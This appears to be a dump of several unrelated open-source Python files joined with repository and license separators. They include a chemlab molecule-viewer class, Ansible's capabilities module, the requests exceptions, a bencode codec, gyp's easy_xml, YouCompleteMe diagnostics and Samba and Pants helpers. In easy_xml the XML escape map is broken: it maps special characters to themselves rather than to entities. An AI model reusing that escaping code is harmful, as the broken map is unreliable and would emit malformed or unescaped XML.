self.box_renderer = self.viewer.add_renderer(BoxRenderer,
system.box_vectors,
color=(100, 100, 100, 255))
self.scale_factors = np.ones_like(self.radii_state.array)
self.bond_radii = np.array(self.bond_renderer.radii)
self.bond_colors = self.bond_renderer.colors_a, self.bond_renderer.colors_b
# For highlight, we'll see
self.viewer.add_post_processing(GlowEffect)
# User controls
self.atom_picker = SpherePicker(self.viewer.widget, system.r_array,
self.radii_state.array)
self.bond_picker = CylinderPicker(self.viewer.widget,
system.r_array.take(system.bonds, axis=0),
self.bond_radii)
self.color_state.changed.connect(self.on_atom_colors_changed)
self.glow_timer = QtCore.QTimer()
def visible_atoms(self):
return self.hidden_state['atoms'].invert().indices
def _gen_atom_renderer(self):
pass
def _gen_cylinder_renderer(self):
pass
def update_box(self, vectors):
self.box_renderer.vectors = vectors.copy()
def update_scale_factors(self, scalefac):
self.scale_factors = scalefac
radii = np.array(self.radii_state.array) * scalefac
self.atom_renderer.update_radii(radii)
self.viewer.widget.update()
def update_positions(self, r_array):
self.bond_renderer.update_positions(r_array)
self.atom_renderer.update_positions(r_array)
# User controls
hmsk = self.hidden_state['bonds'].invert().indices # Visible
va = self.visible_atoms()
self.atom_picker = SpherePicker(self.viewer.widget, r_array[va],
self.radii_state.array[va])
self.bond_picker = CylinderPicker(self.viewer.widget,
r_array.take(self.system.bonds[hmsk], axis=0),
self.bond_radii[hmsk])
def on_atom_hidden_changed(self):
# When hidden state changes, the view update itself
# Update the Renderers and the pickers
#no_sel = self.selection_state['atoms'].indices
# Take everything else
#sel = np.ones(self.system.n_atoms, dtype='bool')
#sel[self.hidden_state['atoms'].mask] = False
#sel[no_sel] = False
sel = self.hidden_state['atoms'].invert().mask
self.atom_renderer.hide(sel)
# Pickers
self.atom_picker = SpherePicker(self.viewer.widget, self.system.r_array[sel],
self.radii_state.array[sel])
# Reset selection
self.selection_state['atoms'] = Selection([], self.system.n_atoms)
self.on_atom_selection_changed()
self.viewer.update()
def on_bond_hidden_changed(self):
# When hidden state changes, the view update itself
# Update the renderers and the pickers
sel = self.hidden_state['bonds'].invert().indices
system = self.system
# We need to update the pickers...
self.bond_picker = CylinderPicker(
self.viewer.widget,
system.r_array.take(self.system.bonds, axis=0)[sel, :],
self.bond_radii[sel])
# And the bond renderer
self.viewer.remove_renderer(self.bond_renderer)
self.bond_renderer = self.viewer.add_renderer(BondRenderer,
system.bonds[sel], system.r_array,
system.type_array, style='impostors')
self.viewer.update()
def on_atom_selection_changed(self):
#self.glow_timer.stop()
# When selection state changes, the view update itself
sel = self.selection_state['atoms'].indices
cols = np.array(self.atom_colors.array)
cols[sel, -1] = 50
self.atom_renderer.update_colors(cols)
self.viewer.update()
def on_bond_selection_changed(self):
# When selection state changes, the view update itself
if self.system.n_bonds == 0:
return
sel = self.selection_state['bonds'].indices
cols_a, cols_b = self.bond_colors
cols_a = cols_a.copy()
cols_b = cols_b.copy()
cols_a[sel, -1] = 50
cols_b[sel, -1] = 50
hmsk = self.hidden_state['bonds'].invert().indices
self.bond_renderer.update_colors(cols_a[hmsk], cols_b[hmsk])
def on_click(self, x, y):
# This is basically our controller
x, y = self.viewer.widget.screen_to_normalized(x, y)
# I need another picker
a_indices, a_dists = self.atom_picker.pick(x, y)
b_indices, b_dists = self.bond_picker.pick(x, y)
indices = list(itertools.chain(a_indices, b_indices))
#print 'A', a_indices, a_dists
#print 'B', b_indices, b_dists
# This applies only to visible atoms
visible_atoms = self.hidden_state['atoms'].invert().indices
#visible_atoms = (~self.hidden_state.atom_hidden_mask).nonzero()[0]
if len(indices) == 0 :
# Cancel selection
self.selection_state['atoms'] = Selection([], self.system.n_atoms)
self.selection_state['bonds'] = Selection([], self.system.n_bonds)
self.on_atom_selection_changed()
self.on_bond_selection_changed()
else:
# Determine the candidate
dist_a = a_dists[0] if a_indices else float('inf')
dist_b = b_dists[0] if b_indices else float('inf')
if dist_a < dist_b:
self.atom_clicked.emit(visible_atoms[a_indices[0]])
self.selection_state['atoms'] \
= self.selection_state['atoms'].subtract(
Selection([visible_atoms[a_indices[0]]],
self.system.n_atoms))
self.on_atom_selection_changed()
else:
# TODO: fix for visible bonds
self.bond_clicked.emit([b_indices[0]])
self.selection_state['bonds'] \
= self.selection_state['bonds'].subtract(
Selection([b_indices[0]], self.system.n_bonds))
self.on_bond_selection_changed()
self.viewer.widget.update()
def select(self, selections):
'''Make a selection in this
representation. BallAndStickRenderer support selections of
atoms and bonds.
To select the first atom and the first bond you can use the
following code::
from chemlab.mviewer.state import Selection
representation.select({'atoms': Selection([0], system.n_atoms),
'bonds': Selection([0], system.n_bonds)})
Returns the current Selection
'''
if 'atoms' in selections:
self.selection_state['atoms'] = selections['atoms']
self.on_atom_selection_changed()
if 'bonds' in selections:
self.selection_state['bonds'] = selections['bonds']
self.on_bond_selection_changed()
if 'box' in selections:
self.selection_state['box'] = selections['box']
return self.selection_state
def hide(self, selections):
'''Hide objects in this representation. BallAndStickRepresentation
support selections of atoms and bonds.
To hide the first atom and the first bond you can use the
following code::
from chemlab.mviewer.state import Selection
representation.hide({'atoms': Selection([0], system.n_atoms),
'bonds': Selection([0], system.n_bonds)})
Returns the current Selection of hidden atoms and bonds.
'''
if 'atoms' in selections:
self.hidden_state['atoms'] = selections['atoms']
self.on_atom_hidden_changed()
if 'bonds' in selections:
self.hidden_state['bonds'] = selections['bonds']
self.on_bond_hidden_changed()
if 'box' in selections:
self.hidden_state['box'] = box_s = selections['box']
if box_s.mask[0]:
if self.viewer.has_renderer(self.box_renderer):
self.viewer.remove_renderer(self.box_renderer)
else:
if not self.viewer.has_renderer(self.box_renderer):
self.viewer.add_renderer(self.box_renderer)
return self.hidden_state
def scale(self, selections, factor):
'''Scale the objects represented by *selections* up to a
certain *factor*.
'''
if 'atoms' in selections:
atms = selections['atoms'].mask
if factor is None:
self.scale_factors[atms] = 1.0
else:
self.scale_factors[atms] = factor
self.update_scale_factors(self.scale_factors)
def change_radius(self, selections, value):
'''Change the radius of each atom by a certain value
'''
if 'atoms' in selections:
atms = selections['atoms'].mask
if value is None:
self.radii_state.array[atms] = [vdw_radii.get(t) * 0.3 for t in self.system.type_array[atms]]
else:
self.radii_state.array[atms] = value
self.update_scale_factors(self.scale_factors)
def change_color(self, selections, value):
'''Change the color of each atom by a certain value. *value*
should be a tuple.
'''
if 'atoms' in selections:
atms = selections['atoms'].mask
if value is None:
#self.radii_state.array[atms] = [vdw_radii.get(t) * 0.3 for t in self.system.type_array[atms]]
self.atom_colors.array[atms, 0:3] = [self.color_scheme.get(t, colors.deep_pink)[0:3]
for t in self.system.type_array[atms]]
else:
self.atom_colors.array[atms, 0:3] = value[0:3]
self.atom_renderer.update_colors(self.atom_colors.array)
self.on_atom_colors_changed() | gpl-3.0 |
KimNorgaard/ansible-modules-extras | system/capabilities.py | 79 | 6980 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Nate Coraor <nate@bx.psu.edu>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: capabilities
short_description: Manage Linux capabilities
description:
- This module manipulates files privileges using the Linux capabilities(7) system.
version_added: "1.6"
options:
path:
description:
- Specifies the path to the file to be managed.
required: true
default: null
capability:
description:
- Desired capability to set (with operator and flags, if state is C(present)) or remove (if state is C(absent))
required: true
default: null
aliases: [ 'cap' ]
state:
description:
- Whether the entry should be present or absent in the file's capabilities.
choices: [ "present", "absent" ]
default: present
notes:
- The capabilities system will automatically transform operators and flags
into the effective set, so (for example, cap_foo=ep will probably become
cap_foo+ep). This module does not attempt to determine the final operator
and flags to compare, so you will want to ensure that your capabilities
argument matches the final capabilities.
requirements: []
author: "Nate Coraor (@natefoo)"
'''
EXAMPLES = '''
# Set cap_sys_chroot+ep on /foo
- capabilities: path=/foo capability=cap_sys_chroot+ep state=present
# Remove cap_net_bind_service from /bar
- capabilities: path=/bar capability=cap_net_bind_service state=absent
'''
OPS = ( '=', '-', '+' )
# ==============================================================
import os
import tempfile
import re
class CapabilitiesModule(object):
platform = 'Linux'
distribution = None
def __init__(self, module):
self.module = module
self.path = module.params['path'].strip()
self.capability = module.params['capability'].strip().lower()
self.state = module.params['state']
self.getcap_cmd = module.get_bin_path('getcap', required=True)
self.setcap_cmd = module.get_bin_path('setcap', required=True)
self.capability_tup = self._parse_cap(self.capability, op_required=self.state=='present')
self.run()
def run(self):
current = self.getcap(self.path)
caps = [ cap[0] for cap in current ]
if self.state == 'present' and self.capability_tup not in current:
# need to add capability
if self.module.check_mode:
self.module.exit_json(changed=True, msg='capabilities changed')
else:
# remove from current cap list if it's already set (but op/flags differ)
current = filter(lambda x: x[0] != self.capability_tup[0], current)
# add new cap with correct op/flags
current.append( self.capability_tup )
self.module.exit_json(changed=True, state=self.state, msg='capabilities changed', stdout=self.setcap(self.path, current))
elif self.state == 'absent' and self.capability_tup[0] in caps:
# need to remove capability
if self.module.check_mode:
self.module.exit_json(changed=True, msg='capabilities changed')
else:
# remove from current cap list and then set current list
current = filter(lambda x: x[0] != self.capability_tup[0], current)
self.module.exit_json(changed=True, state=self.state, msg='capabilities changed', stdout=self.setcap(self.path, current))
self.module.exit_json(changed=False, state=self.state)
def getcap(self, path):
rval = []
cmd = "%s -v %s" % (self.getcap_cmd, path)
rc, stdout, stderr = self.module.run_command(cmd)
# If file xattrs are set but no caps are set the output will be:
# '/foo ='
# If file xattrs are unset the output will be:
# '/foo'
# If the file does not eixst the output will be (with rc == 0...):
# '/foo (No such file or directory)'
if rc != 0 or (stdout.strip() != path and stdout.count(' =') != 1):
self.module.fail_json(msg="Unable to get capabilities of %s" % path, stdout=stdout.strip(), stderr=stderr)
if stdout.strip() != path:
caps = stdout.split(' =')[1].strip().split()
for cap in caps:
cap = cap.lower()
# getcap condenses capabilities with the same op/flags into a
# comma-separated list, so we have to parse that
if ',' in cap:
cap_group = cap.split(',')
cap_group[-1], op, flags = self._parse_cap(cap_group[-1])
for subcap in cap_group:
rval.append( ( subcap, op, flags ) )
else:
rval.append(self._parse_cap(cap))
return rval
def setcap(self, path, caps):
caps = ' '.join([ ''.join(cap) for cap in caps ])
cmd = "%s '%s' %s" % (self.setcap_cmd, caps, path)
rc, stdout, stderr = self.module.run_command(cmd)
if rc != 0:
self.module.fail_json(msg="Unable to set capabilities of %s" % path, stdout=stdout, stderr=stderr)
else:
return stdout
def _parse_cap(self, cap, op_required=True):
opind = -1
try:
i = 0
while opind == -1:
opind = cap.find(OPS[i])
i += 1
except:
if op_required:
self.module.fail_json(msg="Couldn't find operator (one of: %s)" % str(OPS))
else:
return (cap, None, None)
op = cap[opind]
cap, flags = cap.split(op)
return (cap, op, flags)
# ==============================================================
# main
def main():
# defining module
module = AnsibleModule(
argument_spec = dict(
path = dict(aliases=['key'], required=True),
capability = dict(aliases=['cap'], required=True),
state = dict(default='present', choices=['present', 'absent']),
),
supports_check_mode=True
)
CapabilitiesModule(module)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
timlinux/QGIS | python/plugins/processing/algs/grass7/ext/v_sample.py | 45 | 1398 | # -*- coding: utf-8 -*-
"""
***************************************************************************
v_sample.py
-----------
Date : February 2016
Copyright : (C) 2016 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'February 2016'
__copyright__ = '(C) 2016, Médéric Ribreux'
def processInputs(alg, parameters, context, feedback):
if 'input' in alg.exportedLayers:
return
# We need to import the vector with v.in.ogr
# and we can use r.external for the raster
alg.loadVectorLayerFromParameter('input', parameters, context, feedback, False)
alg.loadRasterLayerFromParameter('raster', parameters, context, True)
alg.postInputs(context)
| gpl-2.0 |
lumig242/Hue-Integration-with-CDAP | desktop/core/ext-py/requests-2.10.0/requests/exceptions.py | 352 | 2776 | # -*- coding: utf-8 -*-
"""
requests.exceptions
~~~~~~~~~~~~~~~~~~~
This module contains the set of Requests' exceptions.
"""
from .packages.urllib3.exceptions import HTTPError as BaseHTTPError
class RequestException(IOError):
"""There was an ambiguous exception that occurred while handling your
request."""
def __init__(self, *args, **kwargs):
"""
Initialize RequestException with `request` and `response` objects.
"""
response = kwargs.pop('response', None)
self.response = response
self.request = kwargs.pop('request', None)
if (response is not None and not self.request and
hasattr(response, 'request')):
self.request = self.response.request
super(RequestException, self).__init__(*args, **kwargs)
class HTTPError(RequestException):
"""An HTTP error occurred."""
class ConnectionError(RequestException):
"""A Connection error occurred."""
class ProxyError(ConnectionError):
"""A proxy error occurred."""
class SSLError(ConnectionError):
"""An SSL error occurred."""
class Timeout(RequestException):
"""The request timed out.
Catching this error will catch both
:exc:`~requests.exceptions.ConnectTimeout` and
:exc:`~requests.exceptions.ReadTimeout` errors.
"""
class ConnectTimeout(ConnectionError, Timeout):
"""The request timed out while trying to connect to the remote server.
Requests that produced this error are safe to retry.
"""
class ReadTimeout(Timeout):
"""The server did not send any data in the allotted amount of time."""
class URLRequired(RequestException):
"""A valid URL is required to make a request."""
class TooManyRedirects(RequestException):
"""Too many redirects."""
class MissingSchema(RequestException, ValueError):
"""The URL schema (e.g. http or https) is missing."""
class InvalidSchema(RequestException, ValueError):
"""See defaults.py for valid schemas."""
class InvalidURL(RequestException, ValueError):
""" The URL provided was somehow invalid. """
class ChunkedEncodingError(RequestException):
"""The server declared chunked encoding but sent an invalid chunk."""
class ContentDecodingError(RequestException, BaseHTTPError):
"""Failed to decode response content"""
class StreamConsumedError(RequestException, TypeError):
"""The content for this response was already consumed"""
class RetryError(RequestException):
"""Custom retries logic failed"""
# Warnings
class RequestsWarning(Warning):
"""Base warning for Requests."""
pass
class FileModeWarning(RequestsWarning, DeprecationWarning):
"""
A file was opened in text mode, but Requests determined its binary length.
"""
pass
| apache-2.0 |
Mhynlo/SickRage | lib/bencode/__init__.py | 13 | 3301 | # The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Petru Paler
from BTL import BTFailure
def decode_int(x, f):
f += 1
newf = x.index('e', f)
n = int(x[f:newf])
if x[f] == '-':
if x[f + 1] == '0':
raise ValueError
elif x[f] == '0' and newf != f+1:
raise ValueError
return (n, newf+1)
def decode_string(x, f):
colon = x.index(':', f)
n = int(x[f:colon])
if x[f] == '0' and colon != f+1:
raise ValueError
colon += 1
return (x[colon:colon+n], colon+n)
def decode_list(x, f):
r, f = [], f+1
while x[f] != 'e':
v, f = decode_func[x[f]](x, f)
r.append(v)
return (r, f + 1)
def decode_dict(x, f):
r, f = {}, f+1
while x[f] != 'e':
k, f = decode_string(x, f)
r[k], f = decode_func[x[f]](x, f)
return (r, f + 1)
decode_func = {}
decode_func['l'] = decode_list
decode_func['d'] = decode_dict
decode_func['i'] = decode_int
decode_func['0'] = decode_string
decode_func['1'] = decode_string
decode_func['2'] = decode_string
decode_func['3'] = decode_string
decode_func['4'] = decode_string
decode_func['5'] = decode_string
decode_func['6'] = decode_string
decode_func['7'] = decode_string
decode_func['8'] = decode_string
decode_func['9'] = decode_string
def bdecode(x):
try:
r, l = decode_func[x[0]](x, 0)
except (IndexError, KeyError, ValueError):
raise BTFailure("not a valid bencoded string")
# if l != len(x):
# raise BTFailure("invalid bencoded value (data after valid prefix)")
return r
from types import StringType, IntType, LongType, DictType, ListType, TupleType
class Bencached(object):
__slots__ = ['bencoded']
def __init__(self, s):
self.bencoded = s
def encode_bencached(x,r):
r.append(x.bencoded)
def encode_int(x, r):
r.extend(('i', str(x), 'e'))
def encode_bool(x, r):
if x:
encode_int(1, r)
else:
encode_int(0, r)
def encode_string(x, r):
r.extend((str(len(x)), ':', x))
def encode_list(x, r):
r.append('l')
for i in x:
encode_func[type(i)](i, r)
r.append('e')
def encode_dict(x,r):
r.append('d')
ilist = x.items()
ilist.sort()
for k, v in ilist:
r.extend((str(len(k)), ':', k))
encode_func[type(v)](v, r)
r.append('e')
encode_func = {}
encode_func[Bencached] = encode_bencached
encode_func[IntType] = encode_int
encode_func[LongType] = encode_int
encode_func[StringType] = encode_string
encode_func[ListType] = encode_list
encode_func[TupleType] = encode_list
encode_func[DictType] = encode_dict
try:
from types import BooleanType
encode_func[BooleanType] = encode_bool
except ImportError:
pass
def bencode(x):
r = []
encode_func[type(x)](x, r)
return ''.join(r)
| gpl-3.0 |
rcarauta/rcarauta-projects | node_modules/node-gyp/gyp/pylib/gyp/easy_xml.py | 1558 | 4945 | # Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import os
def XmlToString(content, encoding='utf-8', pretty=False):
""" Writes the XML content to disk, touching the file only if it has changed.
Visual Studio files have a lot of pre-defined structures. This function makes
it easy to represent these structures as Python data structures, instead of
having to create a lot of function calls.
Each XML element of the content is represented as a list composed of:
1. The name of the element, a string,
2. The attributes of the element, a dictionary (optional), and
3+. The content of the element, if any. Strings are simple text nodes and
lists are child elements.
Example 1:
<test/>
becomes
['test']
Example 2:
<myelement a='value1' b='value2'>
<childtype>This is</childtype>
<childtype>it!</childtype>
</myelement>
becomes
['myelement', {'a':'value1', 'b':'value2'},
['childtype', 'This is'],
['childtype', 'it!'],
]
Args:
content: The structured content to be converted.
encoding: The encoding to report on the first XML line.
pretty: True if we want pretty printing with indents and new lines.
Returns:
The XML content as a string.
"""
# We create a huge list of all the elements of the file.
xml_parts = ['<?xml version="1.0" encoding="%s"?>' % encoding]
if pretty:
xml_parts.append('\n')
_ConstructContentList(xml_parts, content, pretty)
# Convert it to a string
return ''.join(xml_parts)
def _ConstructContentList(xml_parts, specification, pretty, level=0):
""" Appends the XML parts corresponding to the specification.
Args:
xml_parts: A list of XML parts to be appended to.
specification: The specification of the element. See EasyXml docs.
pretty: True if we want pretty printing with indents and new lines.
level: Indentation level.
"""
# The first item in a specification is the name of the element.
if pretty:
indentation = ' ' * level
new_line = '\n'
else:
indentation = ''
new_line = ''
name = specification[0]
if not isinstance(name, str):
raise Exception('The first item of an EasyXml specification should be '
'a string. Specification was ' + str(specification))
xml_parts.append(indentation + '<' + name)
# Optionally in second position is a dictionary of the attributes.
rest = specification[1:]
if rest and isinstance(rest[0], dict):
for at, val in sorted(rest[0].iteritems()):
xml_parts.append(' %s="%s"' % (at, _XmlEscape(val, attr=True)))
rest = rest[1:]
if rest:
xml_parts.append('>')
all_strings = reduce(lambda x, y: x and isinstance(y, str), rest, True)
multi_line = not all_strings
if multi_line and new_line:
xml_parts.append(new_line)
for child_spec in rest:
# If it's a string, append a text node.
# Otherwise recurse over that child definition
if isinstance(child_spec, str):
xml_parts.append(_XmlEscape(child_spec))
else:
_ConstructContentList(xml_parts, child_spec, pretty, level + 1)
if multi_line and indentation:
xml_parts.append(indentation)
xml_parts.append('</%s>%s' % (name, new_line))
else:
xml_parts.append('/>%s' % new_line)
def WriteXmlIfChanged(content, path, encoding='utf-8', pretty=False,
win32=False):
""" Writes the XML content to disk, touching the file only if it has changed.
Args:
content: The structured content to be written.
path: Location of the file.
encoding: The encoding to report on the first line of the XML file.
pretty: True if we want pretty printing with indents and new lines.
"""
xml_string = XmlToString(content, encoding, pretty)
if win32 and os.linesep != '\r\n':
xml_string = xml_string.replace('\n', '\r\n')
try:
xml_string = xml_string.encode(encoding)
except Exception:
xml_string = unicode(xml_string, 'latin-1').encode(encoding)
# Get the old content
try:
f = open(path, 'r')
existing = f.read()
f.close()
except:
existing = None
# It has changed, write it
if existing != xml_string:
f = open(path, 'w')
f.write(xml_string)
f.close()
_xml_escape_map = {
'"': '"',
"'": ''',
'<': '<',
'>': '>',
'&': '&',
'\n': '
',
'\r': '
',
}
_xml_escape_re = re.compile(
"(%s)" % "|".join(map(re.escape, _xml_escape_map.keys())))
def _XmlEscape(value, attr=False):
""" Escape a string for inclusion in XML."""
def replace(match):
m = match.string[match.start() : match.end()]
# don't replace single quotes in attrs
if attr and m == "'":
return m
return _xml_escape_map[m]
return _xml_escape_re.sub(replace, value)
| mit |
mzl9039/YouCompleteMe | python/ycm/diagnostic_interface.py | 9 | 8419 | #!/usr/bin/env python
#
# Copyright (C) 2013 Google Inc.
#
# This file is part of YouCompleteMe.
#
# YouCompleteMe is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# YouCompleteMe is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with YouCompleteMe. If not, see <http://www.gnu.org/licenses/>.
from collections import defaultdict, namedtuple
from ycm import vimsupport
import vim
class DiagnosticInterface( object ):
def __init__( self, user_options ):
self._user_options = user_options
# Line and column numbers are 1-based
self._buffer_number_to_line_to_diags = defaultdict(
lambda: defaultdict( list ) )
self._next_sign_id = 1
self._previous_line_number = -1
self._diag_message_needs_clearing = False
self._placed_signs = []
def OnCursorMoved( self ):
line, _ = vimsupport.CurrentLineAndColumn()
line += 1 # Convert to 1-based
if line != self._previous_line_number:
self._previous_line_number = line
if self._user_options[ 'echo_current_diagnostic' ]:
self._EchoDiagnosticForLine( line )
def UpdateWithNewDiagnostics( self, diags ):
normalized_diags = [ _NormalizeDiagnostic( x ) for x in diags ]
self._buffer_number_to_line_to_diags = _ConvertDiagListToDict(
normalized_diags )
if self._user_options[ 'enable_diagnostic_signs' ]:
self._placed_signs, self._next_sign_id = _UpdateSigns(
self._placed_signs,
self._buffer_number_to_line_to_diags,
self._next_sign_id )
if self._user_options[ 'enable_diagnostic_highlighting' ]:
_UpdateSquiggles( self._buffer_number_to_line_to_diags )
if self._user_options[ 'always_populate_location_list' ]:
vimsupport.SetLocationList(
vimsupport.ConvertDiagnosticsToQfList( normalized_diags ) )
def _EchoDiagnosticForLine( self, line_num ):
buffer_num = vim.current.buffer.number
diags = self._buffer_number_to_line_to_diags[ buffer_num ][ line_num ]
if not diags:
if self._diag_message_needs_clearing:
# Clear any previous diag echo
vimsupport.EchoText( '', False )
self._diag_message_needs_clearing = False
return
vimsupport.EchoTextVimWidth( diags[ 0 ][ 'text' ] )
self._diag_message_needs_clearing = True
def _UpdateSquiggles( buffer_number_to_line_to_diags ):
vimsupport.ClearYcmSyntaxMatches()
line_to_diags = buffer_number_to_line_to_diags[ vim.current.buffer.number ]
for diags in line_to_diags.itervalues():
for diag in diags:
location_extent = diag[ 'location_extent' ]
is_error = _DiagnosticIsError( diag )
if location_extent[ 'start' ][ 'line_num' ] < 0:
location = diag[ 'location' ]
vimsupport.AddDiagnosticSyntaxMatch(
location[ 'line_num' ],
location[ 'column_num' ] )
else:
vimsupport.AddDiagnosticSyntaxMatch(
location_extent[ 'start' ][ 'line_num' ],
location_extent[ 'start' ][ 'column_num' ],
location_extent[ 'end' ][ 'line_num' ],
location_extent[ 'end' ][ 'column_num' ],
is_error = is_error )
for diag_range in diag[ 'ranges' ]:
vimsupport.AddDiagnosticSyntaxMatch(
diag_range[ 'start' ][ 'line_num' ],
diag_range[ 'start' ][ 'column_num' ],
diag_range[ 'end' ][ 'line_num' ],
diag_range[ 'end' ][ 'column_num' ],
is_error = is_error )
def _UpdateSigns( placed_signs, buffer_number_to_line_to_diags, next_sign_id ):
new_signs, kept_signs, next_sign_id = _GetKeptAndNewSigns(
placed_signs, buffer_number_to_line_to_diags, next_sign_id
)
# Dummy sign used to prevent "flickering" in Vim when last mark gets
# deleted from buffer. Dummy sign prevents Vim to collapsing the sign column
# in that case.
# There's also a vim bug which causes the whole window to redraw in some
# conditions (vim redraw logic is very complex). But, somehow, if we place a
# dummy sign before placing other "real" signs, it will not redraw the
# buffer (patch to vim pending).
dummy_sign_needed = not kept_signs and new_signs
if dummy_sign_needed:
vimsupport.PlaceDummySign( next_sign_id + 1,
vim.current.buffer.number,
new_signs[ 0 ].line )
# We place only those signs that haven't been placed yet.
new_placed_signs = _PlaceNewSigns( kept_signs, new_signs )
# We use incremental placement, so signs that already placed on the correct
# lines will not be deleted and placed again, which should improve performance
# in case of many diags. Signs which don't exist in the current diag should be
# deleted.
_UnplaceObsoleteSigns( kept_signs, placed_signs )
if dummy_sign_needed:
vimsupport.UnPlaceDummySign( next_sign_id + 1, vim.current.buffer.number )
return new_placed_signs, next_sign_id
def _GetKeptAndNewSigns( placed_signs, buffer_number_to_line_to_diags,
next_sign_id ):
new_signs = []
kept_signs = []
for buffer_number, line_to_diags in buffer_number_to_line_to_diags.iteritems():
if not vimsupport.BufferIsVisible( buffer_number ):
continue
for line, diags in line_to_diags.iteritems():
for diag in diags:
sign = _DiagSignPlacement( next_sign_id,
line,
buffer_number,
_DiagnosticIsError( diag ) )
if sign not in placed_signs:
new_signs += [ sign ]
next_sign_id += 1
else:
# We use .index here because `sign` contains a new id, but
# we need the sign with the old id to unplace it later on.
# We won't be placing the new sign.
kept_signs += [ placed_signs[ placed_signs.index( sign ) ] ]
return new_signs, kept_signs, next_sign_id
def _PlaceNewSigns( kept_signs, new_signs ):
placed_signs = kept_signs[:]
for sign in new_signs:
# Do not set two signs on the same line, it will screw up storing sign
# locations.
if sign in placed_signs:
continue
vimsupport.PlaceSign( sign.id, sign.line, sign.buffer, sign.is_error )
placed_signs.append(sign)
return placed_signs
def _UnplaceObsoleteSigns( kept_signs, placed_signs ):
for sign in placed_signs:
if sign not in kept_signs:
vimsupport.UnplaceSignInBuffer( sign.buffer, sign.id )
def _ConvertDiagListToDict( diag_list ):
buffer_to_line_to_diags = defaultdict( lambda: defaultdict( list ) )
for diag in diag_list:
location = diag[ 'location' ]
buffer_number = vimsupport.GetBufferNumberForFilename(
location[ 'filepath' ] )
line_number = location[ 'line_num' ]
buffer_to_line_to_diags[ buffer_number ][ line_number ].append( diag )
for line_to_diags in buffer_to_line_to_diags.itervalues():
for diags in line_to_diags.itervalues():
# We also want errors to be listed before warnings so that errors aren't
# hidden by the warnings; Vim won't place a sign oven an existing one.
diags.sort( key = lambda diag: ( diag[ 'location' ][ 'column_num' ],
diag[ 'kind' ] ) )
return buffer_to_line_to_diags
def _DiagnosticIsError( diag ):
return diag[ 'kind' ] == 'ERROR'
def _NormalizeDiagnostic( diag ):
def ClampToOne( value ):
return value if value > 0 else 1
location = diag[ 'location' ]
location[ 'column_num' ] = ClampToOne( location[ 'column_num' ] )
location[ 'line_num' ] = ClampToOne( location[ 'line_num' ] )
return diag
class _DiagSignPlacement( namedtuple( "_DiagSignPlacement",
[ 'id', 'line', 'buffer', 'is_error' ] ) ):
# We want two signs that have different ids but the same location to compare
# equal. ID doesn't matter.
def __eq__( self, other ):
return ( self.line == other.line and
self.buffer == other.buffer and
self.is_error == other.is_error )
| gpl-3.0 |
jkstrick/samba | python/samba/tdb_util.py | 46 | 1491 | # Unix SMB/CIFS implementation.
# tdb util helpers
#
# Copyright (C) Kai Blin <kai@samba.org> 2011
# Copyright (C) Amitay Isaacs <amitay@gmail.com> 2011
# Copyright (C) Andrew Bartlett <abartlet@samba.org> 2013
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import samba
import subprocess
import os
def tdb_copy(file1, file2):
"""Copy tdb file using tdbbackup utility and rename it
"""
# Find the location of tdbbackup tool
dirs = ["bin", samba.param.bin_dir()] + os.getenv('PATH').split(os.pathsep)
for d in dirs:
toolpath = os.path.join(d, "tdbbackup")
if os.path.exists(toolpath):
break
tdbbackup_cmd = [toolpath, "-s", ".copy.tdb", file1]
status = subprocess.call(tdbbackup_cmd, close_fds=True, shell=False)
if status == 0:
os.rename("%s.copy.tdb" % file1, file2)
else:
raise Exception("Error copying %s" % file1)
| gpl-3.0 |
twitter/pants | tests/python/pants_test/engine/scheduler_test_base.py | 1 | 3880 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import shutil
from builtins import object
from pants.base.file_system_project_tree import FileSystemProjectTree
from pants.engine.nodes import Throw
from pants.engine.scheduler import Scheduler
from pants.option.global_options import DEFAULT_EXECUTION_OPTIONS
from pants.util.contextutil import temporary_file_path
from pants.util.dirutil import safe_mkdtemp, safe_rmtree
from pants_test.engine.util import init_native
class SchedulerTestBase(object):
"""A mixin for classes (tests, presumably) which need to create temporary schedulers.
TODO: In the medium term, this should be part of pants_test.test_base.TestBase.
"""
_native = init_native()
def _create_work_dir(self):
work_dir = safe_mkdtemp()
self.addCleanup(safe_rmtree, work_dir)
return work_dir
